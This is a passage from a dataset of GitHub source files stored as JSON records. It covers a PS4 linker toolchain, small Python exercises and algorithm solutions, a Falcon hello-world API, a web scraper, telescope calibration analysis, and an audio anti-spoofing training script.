\"orbis-clang++.exe\" )\n\t\tself._settingsOverrides[\"cc\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang.exe\" )\n\n\n\tdef copy( self, shared ):\n\t\tret = toolchain_gcc.GccLinker.copy( self, shared )\n\t\tPs4Base._copyTo( self, ret )\n\t\treturn ret\n\n\n\tdef InterruptExitCode( self ):\n\t\treturn 2\n\n\n\tdef _getLibraryDirs( self, libDirs, forLinker ):\n\t\t# No library directories necessary since all libraries are linked with full paths.\n\t\treturn \"\"\n\n\n\tdef _getStartGroupFlags( self ):\n\t\treturn \"-Wl,--start-group\"\n\n\n\tdef _getSharedLibraryFlag( self, project ):\n\t\t# PS4 has no explicit \"shared\" flag.\n\t\treturn \"\"\n\n\n\tdef _setupForProject( self, project ):\n\t\tself._project_settings = project\n\t\tif not SCE_ORBIS_SDK_DIR:\n\t\t\tlog.LOG_ERROR( \"No PS4 SDK installation detected!\" )\n\t\t\tcsbuild.Exit( -1 )\n\n\n\tdef _getLibraryArg(self, lib):\n\t\tfor depend in self._project_settings.reconciledLinkDepends:\n\t\t\tdependProj = _shared_globals.projects[depend]\n\t\t\tdependLibName = dependProj.outputName\n\t\t\tsplitName = os.path.splitext(dependLibName)[0]\n\t\t\tif splitName == lib or splitName == \"lib{}\".format( lib ):\n\t\t\t\tif dependProj.type == csbuild.ProjectType.LoadableModule:\n\t\t\t\t\treturn \"\"\n\t\t\t\tif not dependLibName.startswith( \"lib\" ):\n\t\t\t\t\tdependLibName = \"lib{}\".format( dependLibName )\n\t\t\t\treturn '\"{}\" '.format( os.path.join( dependProj.outputDir, dependLibName ) )\n\t\treturn '\"{}\" '.format( self._actual_library_names[lib] )\n\n\n\tdef _getObjcAbiVersionArg(self):\n\t\t# Objective-C is not supported on PS4.\n\t\treturn \"\"\n\n\n\tdef GetLinkCommand( self, project, outputFile, objList ):\n\t\t# The PS4 linker does not implicitly prepend libraries with \"lib\", but it does seem to want them that way\n\t\t# when linking against them via \"-l\". The easy answer is to force all libraries to be prepended with \"lib\".\n\t\tif project.type != csbuild.ProjectType.Application:\n\t\t\toutputBasename = os.path.basename( outputFile )\n\t\t\tif not outputBasename.startswith( \"lib\" ):\n\t\t\t\toutputDirname = os.path.dirname( outputFile )\n\t\t\t\toutputFile = os.path.join( outputDirname, \"lib{}\".format( outputBasename ) )\n\t\tret = toolchain_gcc.GccLinker.GetLinkCommand( self, project, outputFile, objList )\n\t\tif project.type == csbuild.ProjectType.SharedLibrary or project.type == csbuild.ProjectType.LoadableModule:\n\t\t\tret = '{} -Wl,-oformat=prx -Wl,-prx-stub-output-dir=\"{}\"'.format( ret, project.outputDir )\n\t\treturn ret\n\n\n\tdef FindLibrary( self, project, library, libraryDirs, force_static, force_shared ):\n\t\tself._setupForProject( project )\n\t\tlibraryDirs.append( SCE_ORBIS_SYSLIB_DIR )\n\n\t\tfor lib_dir in libraryDirs:\n\t\t\tlog.LOG_INFO( \"Looking for library {} in directory {}...\".format( library, lib_dir ) )\n\t\t\tlib_file_path = os.path.join( lib_dir, library )\n\t\t\tlibFileStatic = \"{}.a\".format( lib_file_path )\n\t\t\tlibFileDynamic = \"{}.prx\".format( lib_file_path )\n\t\t\t# Check for a static lib.\n\t\t\tif os.access( libFileStatic , os.F_OK ) and not force_shared:\n\t\t\t\tself._actual_library_names.update( { library : libFileStatic } )\n\t\t\t\treturn libFileStatic\n\t\t\t# Check for a dynamic lib.\n\t\t\tif os.access( libFileDynamic , os.F_OK ) and not force_static:\n\t\t\t\tself._actual_library_names.update( { library : libFileDynamic } )\n\t\t\t\treturn libFileDynamic\n\n\t\tfor lib_dir in libraryDirs:\n\t\t\t# Compatibility with Linux's way of adding lib- to the front of its libraries\n\t\t\tlibfileCompat = \"lib{}\".format( library )\n\t\t\tlog.LOG_INFO( \"Looking for library {} in directory {}...\".format( libfileCompat, lib_dir ) )\n\t\t\tlib_file_path = os.path.join( lib_dir, libfileCompat )\n\t\t\tlibFileStatic = \"{}.a\".format( lib_file_path )\n\t\t\tlibFileDynamic = \"{}.prx\".format( lib_file_path )\n\t\t\t# Check for a static lib.\n\t\t\tif os.access( libFileStatic , os.F_OK ) and not force_shared:\n\t\t\t\tself._actual_library_names.update( { library : libFileStatic } )\n\t\t\t\treturn libFileStatic\n\t\t\t# Check for a dynamic lib.\n\t\t\tif os.access( libFileDynamic , os.F_OK ) and not force_static:\n\t\t\t\tself._actual_library_names.update( { library : libFileDynamic } )\n\t\t\t\treturn libFileDynamic\n\n\t\t# The library wasn't found.\n\t\treturn None\n\n\n\tdef GetDefaultOutputExtension( self, projectType ):\n\t\tif projectType == csbuild.ProjectType.Application:\n\t\t\treturn \".elf\"\n\t\telif projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn \".a\"\n\t\telif projectType == csbuild.ProjectType.SharedLibrary or projectType == csbuild.ProjectType.LoadableModule:\n\t\t\treturn \".prx\"\n","repo_name":"zoejbare/csbuild","sub_path":"csbuild/proprietary/toolchain_ps4.py","file_name":"toolchain_ps4.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16596047133","text":"\"\"\"\ndefine a class with data members\n@data members\nlen : length of word\nwrd : orignal word\nswapwrd : swapped word\nsortwrd : sorted word\n@methods\nSwapSort() : Constructor\nvoid readword() : to accept a word in upper case\nvoid swapchar() : to swap first and last alphabet\nvoid sortwrd() : to sort the charchters\nvoid diplay() : display sortwrd swapwrd, wrd\n\"\"\"\n\n\ndef main():\n class SwapSort():\n length = 0\n wrd = \"\"\n swapwrd = \"\"\n sortwrd = \"\"\n\n def __init__(self, wrd):\n self.length = len(wrd)\n self.readword(wrd)\n\n def readword(self, nwrd):\n if nwrd.isupper():\n self.wrd = nwrd\n else:\n print(\"\\nWord should be in upper case only\\n\")\n\n def swapchar(self):\n bwrd = bytearray(self.wrd, encoding=\"utf\")\n bwrd[0], bwrd[-1] = bwrd[-1], bwrd[0]\n self.swapwrd = bwrd.decode(\"utf\")\n\n def sortword(self):\n self.sortwrd = \"\".join(sorted(self.wrd))\n\n def display(self):\n print(f'Orignal Word \"{self.wrd}\"')\n print(f'Sorted Word \"{self.sortwrd}\"')\n print(f'Word with swapped charachters \"{self.swapwrd}\"')\n\n word = input(\"Enter a word\")\n s = SwapSort(word)\n # s.readword(\"NEWTEST\")\n s.swapchar()\n s.sortword()\n s.display()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"18BCS4595A/PythonQuestion-part-1-","sub_path":"prblm3.py","file_name":"prblm3.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10783080960","text":"target = int(input())\nbroken = int(input())\nbroken_list = list(map(int, input().split()))\n\"\"\"\n1. 시작점을 정한다.\n2. 시작점 안에 망가진 것이 있나 확인\n3. 있다면 패스 없다면 시작점 길이 + 채널과의 차이\n4. \n\"\"\"\nans = 10000001\ndef check(num):\n num = str(num)\n for elem in num:\n if int(elem) in broken_list:\n return False\n return True\n\nfor base in range(1000001):\n if check(base):\n temp1 = len(str(base)) + abs(target - base)\n temp2 = abs(target - 100)\n if ans > temp1:\n ans = temp1\n if ans > temp2:\n ans = temp2\nprint(ans)","repo_name":"entrekid/daily_algorithm","sub_path":"2020/0426/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12915887725","text":"#!/usr/bin/env python\n\"\"\"\nDo the charge resolution anaylsis\n\nUsage:\n digicam-charge-resolution [options] [--] ...\n\nOptions:\n -h --help Show this screen.\n --max_events=N Maximum number of events to analyse.\n --output_file=OUTPUT File where to store the fit results.\n [default: ./fit_results.npz]\n -c --compute Compute the data.\n -d --display Display.\n -v --debug Enter the debug mode.\n -p --pixel= Give a list of pixel IDs.\n --ac_levels= LED AC DAC level.\n --dc_levels= LED DC DAC level.\n --shift=N number of bins to shift before integrating\n [default: 0].\n --integral_width=N number of bins to integrate over\n [default: 7].\n --charge_linearity=FILE Charge linearity file\n --save_figures Save the plots to the OUTPUT folder\n --timing=FILE Timing npz.\n --saturation_threshold=N Saturation threshold in LSB\n [default: 3000]\n --pulse_tail Use pulse tail for charge integration\n\"\"\"\n\nimport numpy as np\nfrom digicampipe.instrument.light_source import ACLED\nfrom tqdm import tqdm\nimport os\n\nfrom digicampipe.calib.baseline import subtract_baseline, fill_digicam_baseline, fill_dark_baseline, compute_baseline_shift, _crosstalk_drop_from_baseline_shift, _pde_drop_from_baseline_shift, _gain_drop_from_baseline_shift, compute_nsb_rate\nfrom digicampipe.calib.charge import \\\n compute_charge_with_saturation_and_threshold, compute_number_of_pe_from_table, rescale_pulse\nfrom digicampipe.io.event_stream import calibration_event_stream\n\n\ndef charge_to_pe(x, measured_average_charge, true_pe):\n\n X = measured_average_charge.T\n Y = true_pe.T\n\n dX = np.diff(X, axis=-1)\n dY = np.diff(Y, axis=-1)\n\n sign = np.sign(x)\n\n w = np.clip((np.abs(x[:, None]) - X[:, :-1]) / dX[:, :], 0, 1)\n\n y = Y[:, 0] + np.nansum(w * dY[:, :], axis=1)\n y = y * sign\n return y\n\n\ndef compute(files, ac_levels, dc_levels, output_filename, dark_charge, dark_baseline,\n max_events, pixels, integral_width, timing, saturation_threshold, pulse_tail, debug):\n\n\n\n directory = '/sst1m/analyzed/calib/mpe/'\n file_calib = os.path.join(directory, 'mpe_fit_results_combined.npz')\n data_calib = dict(np.load(file_calib))\n\n pe = data_calib['mu']\n pe_err = data_calib['mu_error']\n ac = data_calib['ac_levels'][:, 0]\n ac_led = ACLED(ac, pe, pe_err)\n pde = 0.9 # window filter\n true_pe = ac_led(ac_levels).T * pde\n # mask = true_pe < 5\n # true_pe[mask] = pe[mask]\n\n n_pixels = len(pixels)\n n_ac_level = len(ac_levels)\n n_dc_level = len(dc_levels)\n n_files = len(files)\n\n assert n_files == (n_ac_level * n_dc_level)\n\n debug = False\n pulse_tail = False\n shape = (n_dc_level, n_ac_level, n_pixels)\n nsb_mean = np.zeros(shape)\n nsb_std = np.zeros(shape)\n pe_mean = np.zeros(shape)\n pe_std = np.zeros(shape)\n\n\n print(dark_baseline, dark_charge)\n pe_interpolator = lambda x: charge_to_pe(x, dark_charge, true_pe)\n\n for i, dc_level, in tqdm(enumerate(dc_levels), total=n_dc_level):\n\n for j, ac_level in tqdm(enumerate(ac_levels), total=n_ac_level):\n\n index_file = i * n_ac_level + j\n file = files[index_file]\n events = calibration_event_stream(file, max_events=max_events)\n events = fill_dark_baseline(events, dark_baseline)\n events = fill_digicam_baseline(events)\n events = compute_baseline_shift(events)\n events = subtract_baseline(events)\n # events = compute_nsb_rate(events, gain, pulse_area, crosstalk,\n # bias_resistance, cell_capacitance)\n # events = compute_charge_with_saturation(events, integral_width=7)\n events = compute_charge_with_saturation_and_threshold(events,\n integral_width=integral_width,\n debug=debug,\n trigger_bin=timing,\n saturation_threshold=saturation_threshold,\n pulse_tail=pulse_tail)\n\n events = compute_number_of_pe_from_table(events, pe_interpolator)\n events = rescale_pulse(events, gain_func=_gain_drop_from_baseline_shift,\n xt_func=_crosstalk_drop_from_baseline_shift,\n pde_func=_pde_drop_from_baseline_shift)\n # events = compute_maximal_charge(events)\n\n for n, event in enumerate(events):\n\n pe_mean[i, j] += event.data.reconstructed_number_of_pe\n pe_std[i, j] += event.data.reconstructed_number_of_pe**2\n # nsb_mean[i] += event.data.nsb_rate\n # nsb_std[i] += event.data.nsb_rate**2\n # print(event.data.baseline_shift)\n\n pe_mean[i, j] = pe_mean[i, j] / (n + 1)\n # nsb_mean[i] = nsb_mean[i] / (n + 1)\n pe_std[i, j] = pe_std[i, j] / (n + 1)\n pe_std[i, j] = np.sqrt(pe_std[i, j] - pe_mean[i, j]**2)\n # nsb_std[i] = nsb_std[i] / (n + 1)\n # nsb_std[i] = np.sqrt(nsb_std[i] - nsb_mean[i]**2)\n\n np.savez(output_filename, pe_reco_mean=pe_mean, pe_reco_std=pe_std,\n ac_levels=ac_levels, pe=pe, pe_err=pe_err, true_pe=true_pe,\n nsb_mean=nsb_mean, nsb_std=nsb_std)\n\n\nif __name__ == '__main__':\n\n integral_width = 7\n # saturation_threshold = dict(np.load('/home/alispach/Documents/PhD/ctasoft/digicampipe/thresholds.npz'))\n # saturation_threshold = saturation_threshold['threshold_charge']\n # mean = np.nanmean(saturation_threshold)\n # saturation_threshold[np.isnan(saturation_threshold)] = mean\n\n saturation_threshold = 3000\n\n max_events = None\n directory = '/sst1m/analyzed/calib/mpe/'\n file_calib = os.path.join(directory, 'mpe_fit_results_combined.npz')\n data_calib = np.load(file_calib)\n\n # ac_levels = data_calib['ac_levels'][:, 0]\n ac_levels = np.hstack(\n [np.arange(0, 20, 1), np.arange(20, 40, 5), np.arange(45, 450, 5)])\n pde = 0.9 # window filter\n\n pe = data_calib['mu']\n pe_err = data_calib['mu_error']\n ac_led = ACLED(ac_levels, pe, pe_err)\n\n ac_levels = np.hstack([np.arange(0, 20, 2), np.arange(20, 450, 10)])\n\n true_pe = ac_led(ac_levels).T * pde\n # mask = true_pe < 5\n # true_pe[mask] = pe[mask]\n\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(1505, 1557 + 1, 1)]\n files = [\n '/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i)\n for i in range(1982, 2034 + 1, 1)] # 125 MHz\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(2088, 2140, 1)] # < 660 MHz\n\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(1350, 1454 + 1, 1)]\n # files = files[100:]\n # ac_levels = ac_levels[100:]\n n_pixels = 1296\n n_files = len(files)\n\n assert n_files == len(ac_levels)\n filename_1_dark = 'charge_linearity_24102018_dark.npz'\n filename_2 = 'charge_resolution_24102018_125MHz.npz'\n\n debug = False\n pulse_tail = False\n shape = (n_files, n_pixels)\n nsb_mean = np.zeros(shape)\n nsb_std = np.zeros(shape)\n pe_mean = np.zeros(shape)\n pe_std = np.zeros(shape)\n\n timing = np.load('/sst1m/analyzed/calib/timing/timing.npz')\n timing = timing['time'] // 4\n\n data_1 = dict(np.load(filename_1_dark))\n dark_baseline = data_1['baseline_mean'][0]\n charge_mean = data_1['charge_mean']\n\n print(dark_baseline)\n pe_interpolator = lambda x: charge_to_pe(x, charge_mean, true_pe)\n\n for i, file in tqdm(enumerate(files), total=n_files):\n\n events = calibration_event_stream(file, max_events=max_events)\n events = fill_dark_baseline(events, dark_baseline)\n events = fill_digicam_baseline(events)\n events = compute_baseline_shift(events)\n events = subtract_baseline(events)\n # events = compute_nsb_rate(events, gain, pulse_area, crosstalk,\n # bias_resistance, cell_capacitance)\n # events = compute_charge_with_saturation(events, integral_width=7)\n events = compute_charge_with_saturation_and_threshold(events,\n integral_width=integral_width,\n debug=debug,\n trigger_bin=timing,\n saturation_threshold=saturation_threshold,\n pulse_tail=pulse_tail)\n\n events = compute_number_of_pe_from_table(events, pe_interpolator)\n events = rescale_pulse(events, gain_func=_gain_drop_from_baseline_shift,\n xt_func=_crosstalk_drop_from_baseline_shift,\n pde_func=_pde_drop_from_baseline_shift)\n # events = compute_maximal_charge(events)\n\n for n, event in enumerate(events):\n pe_mean[i] += event.data.reconstructed_number_of_pe\n pe_std[i] += event.data.reconstructed_number_of_pe ** 2\n # nsb_mean[i] += event.data.nsb_rate\n # nsb_std[i] += event.data.nsb_rate**2\n # print(event.data.baseline_shift)\n\n pe_mean[i] = pe_mean[i] / (n + 1)\n # nsb_mean[i] = nsb_mean[i] / (n + 1)\n pe_std[i] = pe_std[i] / (n + 1)\n pe_std[i] = np.sqrt(pe_std[i] - pe_mean[i] ** 2)\n # nsb_std[i] = nsb_std[i] / (n + 1)\n # nsb_std[i] = np.sqrt(nsb_std[i] - nsb_mean[i]**2)\n\n np.savez(filename_2, pe_reco_mean=pe_mean, pe_reco_std=pe_std,\n ac_levels=ac_levels, pe=pe, pe_err=pe_err, true_pe=true_pe,\n nsb_mean=nsb_mean, nsb_std=nsb_std)\n\n","repo_name":"cta-sst-1m/digicampipe","sub_path":"digicampipe/scripts/charge_resolution.py","file_name":"charge_resolution.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"38667066651","text":"import heapq\ndef solution(n, works):\n answer = 0\n \n if sum(works) <= n:\n return 0\n heap = []\n \n for i in works:\n heapq.heappush(heap,(-i,i))\n for i in range(n):\n a = heapq.heappop(heap)[1]\n heapq.heappush(heap,(-(a-1),a-1))\n for i in heap:\n answer += i[1]**2\n return answer\n","repo_name":"joy961208/Programmers-Coding-Test","sub_path":"Level 3/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32890364450","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport falcon\nimport json\nimport os\n \nclass diHola:\n def on_get(self, req, resp):\n \"\"\"Se encarga de solicitudes GET\"\"\"\n quote = {\n 'mensaje': 'Hola Data Latam!',\n 'version': '0.0.4',\n 'variable ambiental': os.environ['MI_VARIABLE']\n }\n\n resp.body = json.dumps(quote)\n \ndemo = falcon.API()\ndemo.add_route('/', diHola())\n","repo_name":"datalatam/docker","sub_path":"falcon_env/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"647515949","text":"'''\nCreated on 6/5/2016\n Scrap module. It only works on wuxiaworld.com for now\n@author: msant\n'''\n\nimport requests\nimport lxml\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef webScrap(url, file):\n r = requests.get(url)\n html = r.text\n soup = BeautifulSoup(html, 'lxml')\n \n #Text parsed by bs4\n raw = soup.get_text()\n content = raw.split('Previous Chapter Next Chapter ')[1]\n\n f = open(file, 'w')\n f.write(content.encode('utf-8'))\n f.close()\n\nwebScrap('http://www.wuxiaworld.com/tdg-index/tdg-chapter-221/','Lecture.txt')\n\n","repo_name":"msantaquiteria/PyReading","sub_path":"src/WebScrap.py","file_name":"WebScrap.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38696255837","text":"# pylint: disable=R0915, R0914\r\n\r\nimport argparse\r\nimport json\r\nimport os\r\nimport yaml\r\n\r\nfrom pathlib import Path\r\nfrom collections import OrderedDict, defaultdict\r\n\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\n\r\nfrom utils.generic.setup import setup_seed\r\nfrom utils.train.schedulers import OptimizerWrapper\r\nfrom utils.audio.data import (\r\n CMDataset,\r\n SamplerBlockShuffleByLen,\r\n customize_collate,\r\n)\r\nfrom utils.eval.eer_tools import cal_roc_eer\r\nfrom utils.eval.model_loaders import load_cm\r\nfrom utils.eval.init import init_system, init_dataloader\r\n\r\n\r\ndef to(vec, device):\r\n if isinstance(vec, list):\r\n return [v.to(device) for v in vec]\r\n else:\r\n return vec.to(device)\r\n\r\n\r\ndef custom_sampler(data_params, lens_file, labels, sampler):\r\n if sampler == \"block_shuffle_by_length\":\r\n with open(lens_file, \"r\", encoding=\"utf8\") as f:\r\n lengths = [int(line.strip().split(\" \")[1]) for line in f]\r\n data_params[\"sampler\"] = SamplerBlockShuffleByLen(\r\n lengths, data_params[\"batch_size\"]\r\n )\r\n data_params[\"collate_fn\"] = customize_collate\r\n data_params[\"shuffle\"] = False\r\n else:\r\n with open(labels) as f:\r\n lines = set([line.strip().split(\" \")[2] for line in f])\r\n data_params[\"sampler\"] = torch.utils.data.sampler.SubsetRandomSampler(\r\n range(len(lines) * 20)\r\n )\r\n return data_params\r\n\r\n\r\ndef get_loaders(spec, config, system, base, extract_device):\r\n data_params = config[\"training_parameters\"][\"data_loader\"]\r\n if config[\"training_parameters\"][\"sampler\"] is not None:\r\n sampler = config[\"training_parameters\"][\"sampler\"]\r\n data_params = custom_sampler(\r\n data_params,\r\n config[\"training_parameters\"].get(\"lens_file\"),\r\n os.path.join(\r\n os.path.join(base, \"labels\"), config[\"training_parameters\"][\"labels\"]\r\n ),\r\n sampler,\r\n )\r\n\r\n data_params[\"eval\"] = False\r\n train_loader, transform, label_fn, final_layer = init_dataloader(\r\n spec,\r\n system,\r\n base,\r\n config[\"training_parameters\"][\"labels\"].split(\".\")[0],\r\n data_params,\r\n extract_device,\r\n aug=config[\"arch\"][\"type\"] == \"WAV2VEC\",\r\n )\r\n\r\n data_params[\"eval\"] = True\r\n data_params[\"shuffle\"] = False\r\n val_loader = init_dataloader(\r\n spec,\r\n system,\r\n base,\r\n config[\"training_parameters\"][\"labels\"].split(\".\")[0],\r\n data_params,\r\n extract_device,\r\n )[0]\r\n return val_loader, train_loader, transform, label_fn, final_layer\r\n\r\n\r\ndef resume_state(path, model, optimizer, val_metric, lr, num_batch, state_dict, device):\r\n parent = Path(path).parent.absolute()\r\n results_f = os.path.join(parent, \"log.log\")\r\n with open(results_f, \"r\") as f:\r\n lines = [line for line in f]\r\n results = [float(line.strip().split(\" \")[7][:-1]) for line in lines if line != \"\\n\"]\r\n best = [float(line.strip().split(\" \")[9]) for line in lines if line != \"\\n\"][-1]\r\n idx = np.where(np.array(results) == best)[0][0]\r\n name = os.path.basename(path)\r\n itrs = idx + 1 if name == \"model.pth\" else int(name.split(\".\")[0][5:]) + 1\r\n optimizer.load(itrs, results, lr, num_batch, val_metric)\r\n model = load_cm(model, path, state_dict, device).to(device)\r\n model.train()\r\n lines = lines[:itrs]\r\n with open(results_f, \"w\") as f:\r\n f.writelines(lines)\r\n return model, optimizer, itrs\r\n\r\n\r\ndef make_model(\r\n spec, config, system, train_device, out, data_len, state_dict, resume=None\r\n):\r\n if config[\"arch\"][\"type\"] == \"DartsRaw\":\r\n config[\"arch\"][\"args\"][\"is_mask\"] = True\r\n\r\n model, loss = init_system(spec, system, train_device, load_checkpoint=False)\r\n optimizer = model.optimizer(\r\n config[\"training_parameters\"][\"optimizer\"][\"type\"],\r\n **config[\"training_parameters\"][\"optimizer\"][\"params\"],\r\n )\r\n optimizer_wrapper = OptimizerWrapper(\r\n optimizer, config[\"training_parameters\"][\"scheduler\"]\r\n )\r\n\r\n if resume:\r\n val_metric = config[\"training_parameters\"][\"val_metric\"]\r\n lr = config[\"training_parameters\"][\"optimizer\"][\"params\"][\"lr\"]\r\n model, optimizer_wrapper, itr = resume_state(\r\n os.path.join(out, resume),\r\n model,\r\n optimizer_wrapper,\r\n val_metric,\r\n lr,\r\n data_len,\r\n state_dict,\r\n train_device,\r\n )\r\n else:\r\n f = open(os.path.join(out, \"log.log\"), \"w\", encoding=\"utf8\")\r\n f.close()\r\n itr = 0\r\n return model, optimizer_wrapper, loss, itr\r\n\r\n\r\ndef unsqueeze_like(tensor: torch.Tensor, like: torch.Tensor):\r\n n_unsqueezes = like.ndim - tensor.ndim\r\n if n_unsqueezes < 0:\r\n raise ValueError(f\"tensor.ndim={tensor.ndim} > like.ndim={like.ndim}\")\r\n if n_unsqueezes == 0:\r\n return tensor\r\n return tensor[(...,) + (None,) * n_unsqueezes]\r\n\r\n\r\ndef process_batch(test_batch, model, loss, device, **kwargs):\r\n # pylint: disable=W0621\r\n test_sample, test_label = test_batch\r\n test_sample = to(test_sample, device)\r\n test_label = test_label.to(device)\r\n out = model(test_sample, **kwargs)\r\n try:\r\n Loss = loss(out, test_label)\r\n return Loss, out\r\n except:\r\n raise\r\n return None, out\r\n\r\n\r\ndef calc_metric(val_metric, probs, lossDict):\r\n # pylint: disable=W0621\r\n if val_metric == \"eer\":\r\n res = cal_roc_eer(probs)\r\n elif val_metric == \"acc\":\r\n out = np.argmax(probs[:, :-1].numpy().reshape((probs.shape[0], 2)), axis=1)\r\n target = probs[:, -1].numpy()\r\n res = np.where(out == target)\r\n res = np.where(out == target)[0].shape[0] / out.shape[0]\r\n else:\r\n res = np.nanmean(lossDict[\"loss\"])\r\n return res\r\n\r\n\r\ndef train_epoch(\r\n system, epoch_num, optimizer, model, loss, train_loader, lr, device, **train_args\r\n):\r\n model.train()\r\n for test_batch in tqdm(train_loader):\r\n Loss, out = process_batch(test_batch, model, loss, device, **train_args)\r\n optimizer.zero_grad()\r\n Loss.backward()\r\n optimizer.step()\r\n optimizer.update(lr, epoch_num, False)\r\n optimizer.update(lr, epoch_num, True)\r\n return optimizer, model\r\n\r\n\r\ndef validate_epoch(\r\n system,\r\n model,\r\n loss,\r\n val_loader,\r\n val_metric,\r\n transform,\r\n final_layer,\r\n label_fn,\r\n eval_mode_for_validation,\r\n batch_size,\r\n device,\r\n):\r\n lossDict = defaultdict(list)\r\n if eval_mode_for_validation:\r\n model.eval()\r\n with torch.no_grad():\r\n probs = torch.empty(0, 2).to(device)\r\n if val_metric == \"acc\":\r\n probs = torch.empty(0, 3).to(device)\r\n for test_batch in val_loader:\r\n Loss, out = process_batch(test_batch, model, loss, device, eval=True)\r\n test_label = test_batch[1].to(device)\r\n t1 = transform(final_layer(out))\r\n t2 = label_fn(test_label.unsqueeze(-1))\r\n t1 = unsqueeze_like(t1, t2)\r\n if val_metric != \"acc\":\r\n t1 = unsqueeze_like(t1[:, -1], t2)\r\n row = torch.cat((t1, t2), dim=-1)\r\n probs = torch.cat((probs, row), dim=0)\r\n try:\r\n lossDict[\"loss\"].append(Loss.item())\r\n except:\r\n pass\r\n probs = probs.to(\"cpu\")\r\n\r\n res = calc_metric(val_metric, probs, lossDict)\r\n return res\r\n\r\n\r\ndef log_epoch(model, res, epoch_num, val_metric, is_best, best_res, out_f):\r\n if is_best:\r\n model.save_state(os.path.join(out_f, \"model.pth\"))\r\n Message = (\r\n \"\\nEpoch: \"\r\n + str(epoch_num)\r\n + \" - Val metric: \"\r\n + val_metric\r\n + \", value: \"\r\n + str(res)\r\n + \", best: \"\r\n + str(best_res)\r\n )\r\n with open(os.path.join(out_f, \"log.log\"), \"a\", encoding=\"utf8\") as log:\r\n log.write(Message + \"\\n\")\r\n print(Message)\r\n\r\n model.save_state(os.path.join(out_f, \"model\" + str(epoch_num) + \".pth\"))\r\n\r\n\r\ndef train(\r\n system,\r\n model,\r\n loss,\r\n optimizer,\r\n train_loader,\r\n val_loader,\r\n num_epochs,\r\n lr,\r\n out_f,\r\n eval_mode_for_validation,\r\n no_best_epoch_num,\r\n val_metric,\r\n drop_path_prob,\r\n transform,\r\n label_fn,\r\n final_layer,\r\n batch_size,\r\n train_args,\r\n device,\r\n start=0,\r\n):\r\n # pylint: disable=R0913,W0621\r\n\r\n for epoch_num in tqdm(range(start, num_epochs)):\r\n if drop_path_prob:\r\n model.drop_path_prob = drop_path_prob * epoch_num / num_epochs\r\n optimizer, model = train_epoch(\r\n system,\r\n epoch_num,\r\n optimizer,\r\n model,\r\n loss,\r\n train_loader,\r\n lr,\r\n device,\r\n **train_args,\r\n )\r\n res = validate_epoch(\r\n system,\r\n model,\r\n loss,\r\n val_loader,\r\n val_metric,\r\n transform,\r\n final_layer,\r\n label_fn,\r\n eval_mode_for_validation,\r\n batch_size,\r\n device,\r\n )\r\n\r\n is_best = epoch_num == 0 or (\r\n res < best_res if val_metric in (\"eer\", \"loss\") else res > best_res\r\n )\r\n if is_best:\r\n best_res, best_epoch, best_epoch_tmp = res, epoch_num, epoch_num\r\n\r\n log_epoch(model, res, epoch_num, val_metric, is_best, best_res, out_f)\r\n\r\n if epoch_num - best_epoch_tmp > 2:\r\n optimizer.increase_delta()\r\n best_epoch_tmp = epoch_num\r\n\r\n if (epoch_num - best_epoch) >= no_best_epoch_num:\r\n print(\"terminating - early stopping\")\r\n break\r\n\r\n return model\r\n\r\n\r\ndef run_train(conf_path, base, resume, devices):\r\n with Path(conf_path[\"config\"]).open(\"rt\", encoding=\"utf8\") as handle:\r\n config = json.load(handle, object_hook=OrderedDict)\r\n\r\n train_device, extract_device = devices.split(\",\")\r\n\r\n lr = config[\"training_parameters\"][\"optimizer\"][\"params\"][\"lr\"]\r\n num_epochs = config[\"training_parameters\"][\"num_epochs\"]\r\n eval_mode_for_validation = config[\"training_parameters\"][\"eval_mode_for_validation\"]\r\n no_best_epoch_num = config[\"training_parameters\"][\"no_best_epoch_num\"]\r\n val_metric = config[\"training_parameters\"][\"val_metric\"]\r\n drop_path_prob = config[\"training_parameters\"].get(\"drop_path_prob\", None)\r\n train_args = config[\"training_parameters\"].get(\"train_args\", {})\r\n out = \"/\".join(config[\"path\"].split(\"/\")[:-1])\r\n batch_size = config[\"training_parameters\"][\"data_loader\"][\"batch_size\"]\r\n\r\n Path(out).mkdir(parents=True, exist_ok=True)\r\n setup_seed(config[\"training_parameters\"][\"seed\"])\r\n val_loader, train_loader, transform, label_fn, final_layer = get_loaders(\r\n conf_path,\r\n config,\r\n config[\"system\"],\r\n base,\r\n extract_device,\r\n )\r\n model, optimizer, loss, itr = make_model(\r\n conf_path,\r\n config,\r\n config[\"system\"],\r\n train_device,\r\n out,\r\n len(train_loader),\r\n config[\"state_dict\"],\r\n resume=resume,\r\n )\r\n\r\n model = train(\r\n config[\"system\"],\r\n model,\r\n loss,\r\n optimizer,\r\n train_loader,\r\n val_loader,\r\n num_epochs,\r\n lr,\r\n out,\r\n 